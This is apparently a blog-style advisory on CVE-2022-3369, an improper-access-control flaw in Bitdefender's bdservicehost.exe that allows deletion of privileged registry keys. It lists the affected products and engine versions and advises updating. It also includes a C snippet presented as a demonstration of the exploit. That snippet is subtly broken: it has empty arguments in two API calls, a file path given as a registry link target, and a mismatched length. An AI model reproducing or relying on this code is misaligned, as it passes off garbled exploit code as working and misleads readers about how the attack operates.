CVE-2022-3369 - Dangerous Improper Access Control Vulnerability in Bitdefender Engines for Windows: What You Need to Know and How to Stay Protected

In recent news, a critical security vulnerability, assigned as CVE-2022-3369, has been discovered in Bitdefender Engines for Windows. This vulnerability, described as an "Improper Access Control" issue, resides in the bdservicehost.exe component and can lead to unauthorized deletion of privileged registry keys. This vulnerability can have severe consequences if exploited by cybercriminals.

In this post, we will go over the details of CVE-2022-3369, the affected Bitdefender products and versions, how an attacker can exploit the vulnerability, and what you can do to stay secure. We'll also provide a code snippet to demonstrate how the vulnerability can be abused.

Affected Bitdefender Products and Versions

The security vulnerability is present in the following Bitdefender products, as long as their engine versions are prior to 7.92659:

* Bitdefender Antivirus Free
* Bitdefender Antivirus Plus
* Bitdefender Internet Security
* Bitdefender Total Security
* Bitdefender Endpoint Security Tools for Windows

Exploiting CVE-2022-3369

A cybercriminal can exploit this vulnerability by creating a registry symlink that points to a privileged registry key. Then, if the attacker can convince the bdservicehost.exe component to delete the symlink, the privileged key will be deleted instead.

Here's a simple example of how the vulnerability can be exploited

#include <windows.h>

int main() {
    HKEY hkResult;
    // Create the symlink
    RegCreateKeyExA(HKEY_CURRENT_USER, "Software\\BitdefenderSymlink", , NULL, REG_OPTION_CREATE_LINK,
                    KEY_WRITE|DELETE, NULL, &hkResult, NULL);
    // Point the symlink to a privileged key
    RegSetValueExA(hkResult, "SymbolicLinkValue", , REG_LINK, "C:\\Windows\\System32\\config\\SAM", 25);
    RegCloseKey(hkResult);
}

This code snippet would create the symlink, point it to a privileged registry key and potentially allow it to be deleted by an attacker exploiting the vulnerability in the bdservicehost.exe component.

Original References

For more detailed information about CVE-2022-3369, as well as the official security advisories and patch release notices, you can visit the following original sources:

* CVE-2022-3369 Advisory
* Bitdefender Security Advisory

Protecting Yourself from CVE-2022-3369

To stay secured against this vulnerability, it is essential to keep your Bitdefender software up-to-date. If you are using one of the affected Bitdefender products with engine versions prior to 7.92659, immediately update your software to the latest version available. Bitdefender updates should be installed automatically in most cases, but you can also manually check for updates within your Bitdefender product interface.

In summary, CVE-2022-3369 is a dangerous vulnerability that can lead to unauthorized deletion of privileged registry keys if exploited. Ensure that your Bitdefender software is updated to the latest version to protect your system from this critical security issue. Stay safe and vigilant!

Timeline

Published on: 11/01/2022 08:15:00 UTC
Last modified on: 02/16/2023 02:56:00 UTC